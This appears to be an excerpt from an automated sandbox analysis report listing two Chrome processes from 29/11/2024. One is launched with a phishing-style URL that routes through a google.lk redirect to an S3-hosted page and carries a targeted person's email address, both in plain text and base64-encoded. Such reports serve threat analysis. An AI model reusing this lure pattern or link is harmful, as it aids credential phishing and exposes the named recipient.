                                                        Start date:29/11/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://google.lk/url?q=mogrady@hollandco.com&hollandco.com&sa=t&url=amp/s/i--iy.s3.us-east-1.amazonaws.com/vocabulary.html#bW9ncmFkeUBob2xsYW5kY28uY29t
                                                        Imagebase:0x7ff7f9810000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        Target ID:6
                                                        Start time:08:29:48
                                                        Start date:29/11/2024
                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2096 --field-trial-handle=1996,i,4822762108358950042,13094913143839525268,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                        Imagebase:0x7ff7f9810000
                                                        File size:3'242'272 bytes
                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high
                                                        Has exited:false

                                                        No disassembly